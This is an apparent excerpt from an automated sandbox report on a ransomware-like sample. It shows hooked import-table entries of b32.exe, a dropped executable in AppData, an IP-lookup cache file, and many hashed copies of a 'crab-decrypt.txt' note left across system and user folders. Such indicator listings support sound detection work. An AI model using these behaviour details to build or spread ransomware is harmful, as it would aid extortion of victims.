IAT private_0x000000000aa50000:+0x14e7c 57. entry of b32.exe 4 bytes kernel32.dll:IsValidLocale+0x0 now points to private_0x000000007f0e0000:+0xcf974b
IAT private_0x000000000aa50000:+0x14e7c 58. entry of b32.exe 4 bytes kernel32.dll:GetUserDefaultLCID+0x0 now points to private_0x000000007fff0000:+0x7524cc0
IAT private_0x000000000aa50000:+0x14e7c 60. entry of b32.exe 4 bytes kernel32.dll:IsDebuggerPresent+0x0 now points to pagefile_0x000000000ae70000:+0x1176990
IAT private_0x000000000aa50000:+0x14e7c 62. entry of b32.exe 4 bytes kernel32.dll:GetCurrentThreadId+0x0 now points to private_0x000000007fff0000:+0x6b5988df
IAT private_0x000000000aa50000:+0x14e7c 63. entry of b32.exe 4 bytes kernel32.dll:ExitProcess+0x0 now points to private_0x000000007fff0000:+0x7d008799
IAT private_0x000000000aa50000:+0x14e7c 65. entry of b32.exe 4 bytes ntdll.dll:RtlSizeHeap+0x0 now points to private_0x000000007fff0000:+0x17edf2fd
IAT private_0x000000000aa50000:+0x14e7c 66. entry of b32.exe 4 bytes kernel32.dll:GetStdHandle+0x0 now points to private_0x000000007fff0000:+0x6a990fce
IAT private_0x000000000aa50000:+0x14e7c 67. entry of b32.exe 4 bytes kernel32.dll:GetFileType+0x0 now points to private_0x000000007fff0000:+0x4ff0c25f
IAT private_0x000000000aa50000:+0x14e7c 68. entry of b32.exe 4 bytes kernel32.dll:GetModuleFileNameA+0x0 now points to private_0x000000007fff0000:+0x46d9dfc1
IAT private_0x000000000aa50000:+0x14e7c 69. entry of b32.exe 4 bytes kernel32.dll:WriteFile+0x0 now points to private_0x000000007fff0000:+0x3e4985e
IAT private_0x000000000aa50000:+0x14e7c 71. entry of b32.exe 4 bytes kernel32.dll:QueryPerformanceCounter+0x0 now points to b32.exe:+0x3379713
IAT private_0x000000000aa50000:+0x14e7c 72. entry of b32.exe 4 bytes kernel32.dll:GetCurrentProcessId+0x0 now points to private_0x000000007fff0000:+0x45488212
IAT private_0x000000000aa50000:+0x14e7c 73. entry of b32.exe 4 bytes kernel32.dll:GetSystemTimeAsFileTime+0x0 now points to private_0x000000007fff0000:+0x185b5570
IAT private_0x000000000aa50000:+0x14e7c 74. entry of b32.exe 4 bytes kernel32.dll:GetEnvironmentStringsW+0x0 now points to private_0x000000007fff0000:+0x574fcded
IAT private_0x000000000aa50000:+0x14e7c 76. entry of b32.exe 4 bytes kernel32.dll:IsValidCodePage+0x0 now points to private_0x000000007fff0000:+0x539c408e
IAT private_0x000000000aa50000:+0x14e7c 79. entry of b32.exe 4 bytes ntdll.dll:RtlReAllocateHeap+0x0 now points to private_0x000000007fff0000:+0x4652d4cc
IAT private_0x000000000aa50000:+0x14e7c 80. entry of b32.exe 4 bytes kernel32.dll:GetConsoleCP+0x0 now points to b32.exe:+0x2241364
IAT private_0x000000000aa50000:+0x14e7c 82. entry of b32.exe 4 bytes user32.dll:DrawCaption+0x0 now points to private_0x000000007fff0000:+0x6d19f1b
IAT private_0x000000000aa50000:+0x14e7c 83. entry of b32.exe 4 bytes user32.dll:IsChild+0x0 now points to private_0x000000007fff0000:+0x7efe7396
IAT private_0x000000000aa50000:+0x14e7c 84. entry of b32.exe 4 bytes user32.dll:DeleteMenu+0x0 now points to private_0x000000007fff0000:+0x4349c4dc
IAT private_0x000000000aa50000:+0x14e7c 87. entry of b32.exe 4 bytes user32.dll:LoadCursorFromFileW+0x0 now points to b32.exe:+0x83b1d02
IAT private_0x000000000aa50000:+0x14e7c 88. entry of b32.exe 4 bytes user32.dll:PostMessageA+0x0 now points to private_0x000000007fff0000:+0x48040a37
IAT private_0x000000000aa50000:+0x14e7c 89. entry of b32.exe 4 bytes user32.dll:GetMenuInfo+0x0 now points to b32.exe:+0x2c3d547
Created Files
»
Filename File Size Hash Values YARA Match Actions
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\cjrckv.exe 316.01 KB MD5: d0ec32ab9a895228881853c93de2f114
SHA1: a618165bd1e1b7952094d1c359b669c1440955e3
SHA256: fbcdb754dc4900291e176d0813c7ae4d676a1162afd932e92fc937c8f038f060
False
c:\users\5p5nrgjn0js halpmcxz\appdata\local\microsoft\windows\temporary internet files\content.ie5\mm5o9xqs\ipv4bot_whatismyipaddress_com[1].htm 0.01 KB MD5: 1ce60aba3db0d29b45efe5656ad3102f
SHA1: 35a57dd3879673a8ac7059436dd822908bc62ae0
SHA256: a72d2ffbc219352f26da160be3929dd799985249b6f0851382dc48a6778fa9b8
False
c:\users\5p5nrgjn0js halpmcxz\appdata\local\microsoft\windows\temporary internet files\content.ie5\mm5o9xqs\eeploreza[1].txt 0.54 KB MD5: 655b9148a0483fdb46cde6ff76468abd
SHA1: d0d172acbef9b9b42b5e8f81b7f4220fcdb605fe
SHA256: 51cd053570467d63f274e982e4bfbc0775309bf5fe5374bf238a4f605a54d0bd
False
c:\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\$recycle.bin\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\$recycle.bin\s-1-5-21-3388679973-3930757225-3770151564-1000\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\config.msi\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\msocache\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\perflogs\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\perflogs\admin\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\program files\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\program files\microsoft sql server compact edition\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\program files\microsoft sql server compact edition\v3.5\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\program files\microsoft sql server compact edition\v3.5\desktop\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\program files (x86)\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\recovery\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\system volume information\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\system volume information\spp\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\system volume information\spp\onlinemetadatacache\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\system volume information\spp\sppcbshivestore\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\system volume information\spp\sppgroupcache\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\adobe\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\adobe\acrobat\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\adobe\acrobat\10.0\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\adobe\acrobat\10.0\collab\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\adobe\acrobat\10.0\forms\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\adobe\acrobat\10.0\javascripts\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\adobe\acrobat\10.0\security\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\adobe\acrobat\10.0\security\crlcache\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\adobe\flash player\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\adobe\flash player\assetcache\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\adobe\flash player\assetcache\d5ntrc6r\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\adobe\headlights\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\adobe\linguistics\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\adobe\linguistics\dictionaries\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\adobe\logtransport2\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\identities\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\identities\{31810c36-5d23-4cce-a3b4-316ded195c38}\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\macromedia\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\macromedia\flash player\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\macromedia\flash player\#sharedobjects\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\macromedia\flash player\#sharedobjects\p7y3f7qb\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\macromedia\flash player\macromedia.com\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\macromedia\flash player\macromedia.com\support\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\addins\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\credentials\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\crypto\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\crypto\rsa\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-3388679973-3930757225-3770151564-1000\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\document building blocks\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\document building blocks\1033\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\document building blocks\1033\14\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\excel\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\excel\xlstart\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\ime12\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\imjp12\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\imjp8_1\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\imjp9_0\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\internet explorer\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\internet explorer\quick launch\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\implicitappshortcuts\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\taskbar\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\internet explorer\userdata\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\internet explorer\userdata\low\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\internet explorer\userdata\low\65ux3yg0\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\internet explorer\userdata\low\ay721qdr\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\internet explorer\userdata\low\dzbkzbic\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\internet explorer\userdata\low\vrlzoz0e\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\mmc\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\ms project\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\ms project\14\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\ms project\14\1033\crab-decrypt.txt 3.20 KB MD5: 2e9000662d1fb6a630239fe8ddd82d58
SHA1: b49255836e981cbd01b0b78691dbf6adc566b8a0
SHA256: c18f20d38ca72a4aff75afb404987261f5ee963c3ea506340616bd55dc654602
False
